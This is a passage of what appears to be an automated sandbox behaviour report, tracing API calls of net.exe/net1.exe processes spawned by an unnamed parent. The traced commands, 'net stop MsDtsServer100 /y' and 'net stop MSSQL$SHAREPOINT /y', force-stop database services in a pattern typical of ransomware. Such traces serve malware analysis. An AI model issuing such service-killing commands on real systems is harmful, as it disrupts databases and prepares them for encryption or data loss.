GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x189080 | out: lpCPInfo=0x189080) returned 1 [0215.163] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.166] sprintf_s (in: _DstBuf=0x38fd20, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0215.166] setlocale (category=0, locale=".437") returned="English_United States.437" [0215.169] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0215.169] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0215.169] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MsDtsServer100 /y" [0215.169] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x38faec, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0215.169] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x70) returned 0x743c18 [0215.169] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0215.169] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x38fcf0 | out: Buffer=0x38fcf0*=0x741c78) returned 0x0 [0215.169] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x38fcf0 | out: Buffer=0x38fcf0*=0x741c90) returned 0x0 [0215.169] _fileno (_File=0x74eb2900) returned -2 [0215.169] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0215.169] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0215.169] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0215.169] _wcsicmp (_String1="config", _String2="stop") returned -16 [0215.169] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0215.170] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0215.170] _wcsicmp (_String1="file", _String2="stop") returned -13 [0215.170] _wcsicmp (_String1="files", _String2="stop") returned -13 [0215.170] _wcsicmp (_String1="group", _String2="stop") returned -12 [0215.170] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0215.170] _wcsicmp (_String1="help", _String2="stop") returned -11 [0215.170] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0215.170] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0215.170] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0215.170] _wcsicmp (_String1="session", _String2="stop") returned -15 [0215.170] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0215.170] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0215.170] _wcsicmp (_String1="share", _String2="stop") returned -12 [0215.170] _wcsicmp (_String1="start", _String2="stop") returned -14 [0215.170] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0215.170] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0215.170] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0215.170] _wcsicmp (_String1="accounts", _String2="MsDtsServer100") returned -12 [0215.170] _wcsicmp (_String1="computer", _String2="MsDtsServer100") returned -10 [0215.170] _wcsicmp (_String1="config", _String2="MsDtsServer100") returned -10 [0215.170] _wcsicmp (_String1="continue", _String2="MsDtsServer100") returned -10 [0215.170] _wcsicmp (_String1="cont", _String2="MsDtsServer100") returned -10 [0215.170] _wcsicmp (_String1="file", _String2="MsDtsServer100") returned -7 [0215.170] _wcsicmp (_String1="files", _String2="MsDtsServer100") returned -7 [0215.170] _wcsicmp (_String1="group", _String2="MsDtsServer100") returned -6 [0215.170] _wcsicmp (_String1="groups", _String2="MsDtsServer100") returned -6 [0215.170] _wcsicmp (_String1="help", _String2="MsDtsServer100") returned -5 [0215.170] _wcsicmp (_String1="helpmsg", _String2="MsDtsServer100") returned -5 [0215.170] _wcsicmp (_String1="localgroup", _String2="MsDtsServer100") returned -1 [0215.170] _wcsicmp (_String1="pause", _String2="MsDtsServer100") returned 3 [0215.170] _wcsicmp (_String1="session", _String2="MsDtsServer100") returned 6 [0215.170] _wcsicmp (_String1="sessions", _String2="MsDtsServer100") returned 6 [0215.170] _wcsicmp (_String1="sess", _String2="MsDtsServer100") returned 6 [0215.170] _wcsicmp (_String1="share", _String2="MsDtsServer100") returned 6 [0215.170] _wcsicmp (_String1="start", _String2="MsDtsServer100") returned 6 [0215.170] _wcsicmp (_String1="stats", _String2="MsDtsServer100") returned 6 [0215.170] _wcsicmp (_String1="statistics", _String2="MsDtsServer100") returned 6 [0215.170] _wcsicmp (_String1="stop", _String2="MsDtsServer100") returned 6 [0215.171] _wcsicmp (_String1="time", _String2="MsDtsServer100") returned 7 [0215.171] _wcsicmp (_String1="user", _String2="MsDtsServer100") returned 8 [0215.171] _wcsicmp (_String1="users", _String2="MsDtsServer100") returned 8 [0215.171] _wcsicmp (_String1="msg", _String2="MsDtsServer100") returned 3 [0215.171] _wcsicmp (_String1="messenger", _String2="MsDtsServer100") returned -14 [0215.171] _wcsicmp (_String1="receiver", _String2="MsDtsServer100") returned 5 [0215.171] _wcsicmp (_String1="rcv", _String2="MsDtsServer100") returned 5 [0215.171] _wcsicmp (_String1="netpopup", _String2="MsDtsServer100") returned 1 [0215.171] _wcsicmp (_String1="redirector", _String2="MsDtsServer100") returned 5 [0215.171] _wcsicmp (_String1="redir", _String2="MsDtsServer100") returned 5 [0215.171] _wcsicmp (_String1="rdr", _String2="MsDtsServer100") returned 5 [0215.171] _wcsicmp (_String1="workstation", _String2="MsDtsServer100") returned 10 [0215.171] _wcsicmp (_String1="work", _String2="MsDtsServer100") returned 10 [0215.171] _wcsicmp (_String1="wksta", _String2="MsDtsServer100") returned 10 [0215.171] _wcsicmp (_String1="prdr", _String2="MsDtsServer100") returned 3 [0215.171] _wcsicmp (_String1="devrdr", _String2="MsDtsServer100") returned -9 [0215.171] _wcsicmp (_String1="lanmanworkstation", _String2="MsDtsServer100") returned -1 [0215.171] _wcsicmp (_String1="server", _String2="MsDtsServer100") returned 6 [0215.171] _wcsicmp (_String1="svr", _String2="MsDtsServer100") returned 6 [0215.171] _wcsicmp (_String1="srv", _String2="MsDtsServer100") returned 6 [0215.171] _wcsicmp (_String1="lanmanserver", _String2="MsDtsServer100") returned -1 [0215.171] _wcsicmp (_String1="alerter", _String2="MsDtsServer100") returned -12 [0215.171] _wcsicmp (_String1="netlogon", _String2="MsDtsServer100") returned 1 [0215.171] _wcsupr (in: _String="MsDtsServer100" | out: _String="MSDTSSERVER100") returned="MSDTSSERVER100" [0215.171] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x7454d8 [0215.174] GetServiceKeyNameW (in: hSCManager=0x7454d8, lpDisplayName="MSDTSSERVER100", lpServiceName=0x18aaf0, lpcchBuffer=0x38fc8c | out: lpServiceName="", lpcchBuffer=0x38fc8c) returned 0 [0215.174] _wcsicmp (_String1="msg", _String2="MSDTSSERVER100") returned 3 [0215.174] _wcsicmp (_String1="messenger", _String2="MSDTSSERVER100") returned -14 [0215.174] _wcsicmp (_String1="receiver", _String2="MSDTSSERVER100") returned 5 [0215.174] _wcsicmp (_String1="rcv", _String2="MSDTSSERVER100") returned 5 [0215.175] _wcsicmp (_String1="redirector", _String2="MSDTSSERVER100") returned 5 [0215.175] _wcsicmp (_String1="redir", _String2="MSDTSSERVER100") returned 5 [0215.175] _wcsicmp (_String1="rdr", _String2="MSDTSSERVER100") returned 5 [0215.175] _wcsicmp (_String1="workstation", _String2="MSDTSSERVER100") returned 10 [0215.175] _wcsicmp (_String1="work", _String2="MSDTSSERVER100") returned 10 [0215.175] _wcsicmp (_String1="wksta", _String2="MSDTSSERVER100") returned 10 [0215.175] _wcsicmp (_String1="prdr", _String2="MSDTSSERVER100") returned 3 [0215.175] _wcsicmp (_String1="devrdr", _String2="MSDTSSERVER100") returned -9 [0215.175] _wcsicmp (_String1="lanmanworkstation", _String2="MSDTSSERVER100") returned -1 [0215.175] _wcsicmp (_String1="server", _String2="MSDTSSERVER100") returned 6 [0215.175] _wcsicmp (_String1="svr", _String2="MSDTSSERVER100") returned 6 [0215.175] _wcsicmp (_String1="srv", _String2="MSDTSSERVER100") returned 6 [0215.175] _wcsicmp (_String1="lanmanserver", _String2="MSDTSSERVER100") returned -1 [0215.175] _wcsicmp (_String1="alerter", _String2="MSDTSSERVER100") returned -12 [0215.175] _wcsicmp (_String1="netlogon", _String2="MSDTSSERVER100") returned 1 [0215.175] NetServiceControl (in: servername=0x0, service="MSDTSSERVER100", opcode=0x0, arg=0x0, bufptr=0x38fc88 | out: bufptr=0x38fc88) returned 0x889 [0215.176] wcscpy_s (in: _Destination=0x18a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0215.176] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0215.176] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x18b338, nSize=0x800, Arguments=0x189dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0215.178] GetFileType (hFile=0x26c) returned 0x3 [0215.178] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x744008 [0215.178] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x744008, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0215.178] WriteFile (in: hFile=0x26c, lpBuffer=0x744008, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x38fbc8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x38fbc8, lpOverlapped=0x0) returned 0 [0215.178] LocalFree (hMem=0x744008) returned 0x0 [0215.178] GetFileType (hFile=0x26c) returned 0x3 [0215.178] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7462b0 [0215.178] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7462b0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nt", lpUsedDefaultChar=0x0) returned 2 [0215.178] WriteFile (in: hFile=0x26c, lpBuffer=0x7462b0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x38fbc8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x38fbc8, lpOverlapped=0x0) returned 0 [0215.178] LocalFree (hMem=0x7462b0) returned 0x0 [0215.178] _ultow (in: _Dest=0x889, _Radix=3734520 | out: _Dest=0x889) returned="2185" [0215.178] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x18b338, nSize=0x800, Arguments=0x189dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0215.178] GetFileType (hFile=0x26c) returned 0x3 [0215.178] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x7462b0 [0215.178] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x7462b0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0215.178] WriteFile (in: hFile=0x26c, lpBuffer=0x7462b0, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x38fbd4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x38fbd4, lpOverlapped=0x0) returned 0 [0215.178] LocalFree (hMem=0x7462b0) returned 0x0 [0215.178] GetFileType (hFile=0x26c) returned 0x3 [0215.178] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7462b0 [0215.178] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7462b0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nt", lpUsedDefaultChar=0x0) returned 2 [0215.178] WriteFile (in: hFile=0x26c, lpBuffer=0x7462b0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x38fbd4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x38fbd4, lpOverlapped=0x0) returned 0 [0215.178] LocalFree (hMem=0x7462b0) returned 0x0 [0215.179] NetApiBufferFree (Buffer=0x741c78) returned 0x0 [0215.179] NetApiBufferFree (Buffer=0x741c90) returned 0x0 [0215.179] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MsDtsServer100 /y" [0215.179] exit (_Code=2) Process: id = "340" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5e316000" os_pid = "0x688" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSSQL$SHAREPOINT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 513 os_tid = 0x130 Process: id = "341" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5ccee000" os_pid = "0x414" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "340" os_parent_pid = "0x688" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$SHAREPOINT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 514 os_tid = 0xba0 [0215.333] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fcc4 | out: lpSystemTimeAsFileTime=0x30fcc4*(dwLowDateTime=0x498a6d40, dwHighDateTime=0x1d57a87)) [0215.333] GetCurrentProcessId () returned 0x414 [0215.333] GetCurrentThreadId () returned 0xba0 [0215.333] GetTickCount () returned 0x116f641 [0215.333] QueryPerformanceCounter (in: lpPerformanceCount=0x30fcbc | out: lpPerformanceCount=0x30fcbc*=33561746207) returned 1 [0215.333] GetModuleHandleA (lpModuleName=0x0) returned 0x9c0000 [0215.333] __set_app_type (_Type=0x1) [0215.333] __p__fmode () returned 0x74eb31f4 [0215.333] __p__commode () returned 0x74eb31fc [0215.333] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x9cffe6) returned 0x0 [0215.333] __getmainargs (in: _Argc=0x9d9064, _Argv=0x9d906c, _Env=0x9d9068, _DoWildCard=0, _StartInfo=0x9d9024 | out: _Argc=0x9d9064, _Argv=0x9d906c, _Env=0x9d9068) returned 0 [0215.334] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0215.334] GetConsoleOutputCP () returned 0x1b5 [0215.334] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x9d9080 | out: lpCPInfo=0x9d9080) returned 1 [0215.334] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.337] sprintf_s (in: _DstBuf=0x30fc7c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0215.337] setlocale (category=0, locale=".437") returned="English_United States.437" [0215.340] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0215.340] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0215.340] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$SHAREPOINT /y" [0215.340] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x30fa48, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0215.340] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x0, Size=0x74) returned 0x3bf788 [0215.340] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0215.340] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x30fc4c | out: Buffer=0x30fc4c*=0x3c1c78) returned 0x0 [0215.340] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x30fc4c | out: Buffer=0x30fc4c*=0x3c1c90) returned 0x0 [0215.340] _fileno (_File=0x74eb2900) returned -2 [0215.340] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0215.340] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0215.340] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0215.340] _wcsicmp (_String1="config", _String2="stop") returned -16 [0215.340] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0215.340] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0215.340] _wcsicmp (_String1="file", _String2="stop") returned -13 [0215.340] _wcsicmp (_String1="files", _String2="stop") returned -13 [0215.340] _wcsicmp (_String1="group", _String2="stop") returned -12 [0215.341] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0215.341] _wcsicmp (_String1="help", _String2="stop") returned -11 [0215.341] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0215.341] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0215.341] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0215.341] _wcsicmp (_String1="session", _String2="stop") returned -15 [0215.341] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0215.341] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0215.341] _wcsicmp (_String1="share", _String2="stop") returned -12 [0215.341] _wcsicmp (_String1="start", _String2="stop") returned -14 [0215.341] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0215.341] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0215.341] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0215.341] _wcsicmp (_String1="accounts", _String2="MSSQL$SHAREPOINT") returned -12 [0215.341] _wcsicmp (_String1="computer", _String2="MSSQL$SHAREPOINT") returned -10 [0215.341] _wcsicmp (_String1="config", _String2="MSSQL$SHAREPOINT") returned -10 [0215.341] _wcsicmp (_String1="continue", _String2="MSSQL$SHAREPOINT") returned -10 [0215.341] _wcsicmp (_String1="cont", _String2="MSSQL$SHAREPOINT") returned -10 [0215.341] _wcsicmp (_String1="file", _String2="MSSQL$SHAREPOINT") returned -7 [0215.341] _wcsicmp (_String1="files", _String2="MSSQL$SHAREPOINT") returned -7 [0215.341] _wcsicmp (_String1="group", _String2="MSSQL$SHAREPOINT") returned -6 [0215.341] _wcsicmp (_String1="groups", _String2="MSSQL$SHAREPOINT") returned -6 [0215.341] _wcsicmp (_String1="help", _String2="MSSQL$SHAREPOINT") returned -5 [0215.341] _wcsicmp (_String1="helpmsg", _String2="MSSQL$SHAREPOINT") returned -5 [0215.341] _wcsicmp (_String1="localgroup", _String2="MSSQL$SHAREPOINT") returned -1 [0215.341] _wcsicmp (_String1="pause", _String2="MSSQL$SHAREPOINT") returned 3 [0215.341] _wcsicmp (_String1="session", _String2="MSSQL$SHAREPOINT") returned 6 [0215.341] _wcsicmp (_String1="sessions", _String2="MSSQL$SHAREPOINT") returned 6 [0215.341] _wcsicmp (_String1="sess", _String2="MSSQL$SHAREPOINT") returned 6 [0215.341] _wcsicmp (_String1="share", _String2="MSSQL$SHAREPOINT") returned 6 [0215.341] _wcsicmp (_String1="start", _String2="MSSQL$SHAREPOINT") returned 6 [0215.341] _wcsicmp (_String1="stats", _String2="MSSQL$SHAREPOINT") returned 6 [0215.341] _wcsicmp (_String1="statistics", _String2="MSSQL$SHAREPOINT") returned 6 [0215.341] _wcsicmp (_String1="stop", _String2="MSSQL$SHAREPOINT") returned 6 [0215.341] _wcsicmp (_String1="time", _String2="MSSQL$SHAREPOINT") returned 7 [0215.341] _wcsicmp (_String1="user", _String2="MSSQL$SHAREPOINT") returned 8 [0215.341] _wcsicmp (_String1="users", _String2="MSSQL$SHAREPOINT") returned 8 [0215.341] _wcsicmp (_String1="msg", _String2="MSSQL$SHAREPOINT") returned -12 [0215.342] _wcsicmp (_String1="messenger", _String2="MSSQL$SHAREPOINT") returned -14 [0215.342] _wcsicmp (_String1="receiver", _String2="MSSQL$SHAREPOINT") returned 5 [0215.342] _wcsicmp (_String1="rcv", _String2="MSSQL$SHAREPOINT") returned 5 [0215.342] _wcsicmp (_String1="netpopup", _String2="MSSQL$SHAREPOINT") returned 1 [0215.342] _wcsicmp (_String1="redirector", _String2="MSSQL$SHAREPOINT") returned 5 [0215.342] _wcsicmp (_String1="redir", _String2="MSSQL$SHAREPOINT") returned 5 [0215.342] _wcsicmp (_String1="rdr", _String2="MSSQL$SHAREPOINT") returned 5 [0215.342] _wcsicmp (_String1="workstation", _String2="MSSQL$SHAREPOINT") returned 10 [0215.342] _wcsicmp (_String1="work", _String2="MSSQL$SHAREPOINT") returned 10 [0215.342] _wcsicmp (_String1="wksta", _String2="MSSQL$SHAREPOINT") returned 10 [0215.342] _wcsicmp (_String1="prdr", _String2="MSSQL$SHAREPOINT") returned 3 [0215.342] _wcsicmp (_String1="devrdr", _String2="MSSQL$SHAREPOINT") returned -9 [0215.342] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$SHAREPOINT") returned -1 [0215.342] _wcsicmp (_String1="server", _String2="MSSQL$SHAREPOINT") returned 6 [0215.342] _wcsicmp (_String1="svr", _String2="MSSQL$SHAREPOINT") returned 6 [0215.342] _wcsicmp (_String1="srv", _String2="MSSQL$SHAREPOINT") returned 6 [0215.342] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$SHAREPOINT") returned -1 [0215.342] _wcsicmp (_String1="alerter", _String2="MSSQL$SHAREPOINT") returned -12 [0215.342] _wcsicmp (_String1="netlogon", _String2="MSSQL$SHAREPOINT") returned 1 [0215.342] _wcsupr (in: _String="MSSQL$SHAREPOINT" | out: _String="MSSQL$SHAREPOINT") returned="MSSQL$SHAREPOINT" [0215.342] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3c5460 [0215.345] GetServiceKeyNameW (in: hSCManager=0x3c5460, lpDisplayName="MSSQL$SHAREPOINT", lpServiceName=0x9daaf0, lpcchBuffer=0x30fbe8 | out: lpServiceName="", lpcchBuffer=0x30fbe8) returned 0 [0215.345] _wcsicmp (_String1="msg", _String2="MSSQL$SHAREPOINT") returned -12 [0215.345] _wcsicmp (_String1="messenger", _String2="MSSQL$SHAREPOINT") returned -14 [0215.345] _wcsicmp (_String1="receiver", _String2="MSSQL$SHAREPOINT") returned 5 [0215.345] _wcsicmp (_String1="rcv", _String2="MSSQL$SHAREPOINT") returned 5 [0215.345] _wcsicmp (_String1="redirector", _String2="MSSQL$SHAREPOINT") returned 5 [0215.345] _wcsicmp (_String1="redir", _String2="MSSQL$SHAREPOINT") returned 5 [0215.345] _wcsicmp (_String1="rdr", _String2="MSSQL$SHAREPOINT") returned 5 [0215.345] _wcsicmp (_String1="workstation", _String2="MSSQL$SHAREPOINT") returned 10 [0215.345] _wcsicmp (_String1="work", _String2="MSSQL$SHAREPOINT") returned 10 [0215.345] _wcsicmp (_String1="wksta", _String2="MSSQL$SHAREPOINT") returned 10 [0215.346] _wcsicmp (_String1="prdr", _String2="MSSQL$SHAREPOINT") returned 3 [0215.346] _wcsicmp (_String1="devrdr", _String2="MSSQL$SHAREPOINT") returned -9 [0215.346] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$SHAREPOINT") returned -1 [0215.346] _wcsicmp (_String1="server", _String2="MSSQL$SHAREPOINT") returned 6 [0215.346] _wcsicmp (_String1="svr", _String2="MSSQL$SHAREPOINT") returned 6 [0215.346] _wcsicmp (_String1="srv", _String2="MSSQL$SHAREPOINT") returned 6 [0215.346] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$SHAREPOINT") returned -1 [0215.346] _wcsicmp (_String1="alerter", _String2="MSSQL$SHAREPOINT") returned -12 [0215.346] _wcsicmp (_String1="netlogon", _String2="MSSQL$SHAREPOINT") returned 1 [0215.346] NetServiceControl (in: servername=0x0, service="MSSQL$SHAREPOINT", opcode=0x0, arg=0x0, bufptr=0x30fbe4 | out: bufptr=0x30fbe4) returned 0x889 [0215.347] wcscpy_s (in: _Destination=0x9da4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0215.347] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0215.347] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x9db338, nSize=0x800, Arguments=0x9d9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0215.348] GetFileType (hFile=0x26c) returned 0x3 [0215.349] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x3c3f90 [0215.349] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x3c3f90, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0215.349] WriteFile (in: hFile=0x26c, lpBuffer=0x3c3f90, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x30fb24, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30fb24, lpOverlapped=0x0) returned 0 [0215.349] LocalFree (hMem=0x3c3f90) returned 0x0 [0215.349] GetFileType (hFile=0x26c) returned 0x3 [0215.349] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3c6238 [0215.349] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3c6238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n<", lpUsedDefaultChar=0x0) returned 2 [0215.349] WriteFile (in: hFile=0x26c, lpBuffer=0x3c6238, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x30fb24, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30fb24, lpOverlapped=0x0) returned 0 [0215.349] LocalFree (hMem=0x3c6238) returned 0x0 [0215.349] _ultow (in: _Dest=0x889, _Radix=3210068 | out: _Dest=0x889) returned="2185" [0215.349] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x9db338, nSize=0x800, Arguments=0x9d9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0215.349] GetFileType (hFile=0x26c) returned 0x3 [0215.349] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x3c6238 [0215.349] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x3c6238, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0215.349] WriteFile (in: hFile=0x26c, lpBuffer=0x3c6238, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x30fb30, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30fb30, lpOverlapped=0x0) returned 0 [0215.349] LocalFree (hMem=0x3c6238) returned 0x0 [0215.349] GetFileType (hFile=0x26c) returned 0x3 [0215.349] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3c6238 [0215.349] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3c6238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n<", lpUsedDefaultChar=0x0) returned 2 [0215.349] WriteFile (in: hFile=0x26c, lpBuffer=0x3c6238, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x30fb30, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30fb30, lpOverlapped=0x0) returned 0 [0215.349] LocalFree (hMem=0x3c6238) returned 0x0 [0215.350] NetApiBufferFree (Buffer=0x3c1c78) returned 0x0 [0215.350] NetApiBufferFree (Buffer=0x3c1c90) returned 0x0 [0215.350] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$SHAREPOINT /y" [0215.350] exit (_Code=2) Process: id = "342" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x28f1b000" os_pid = "0x7d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" 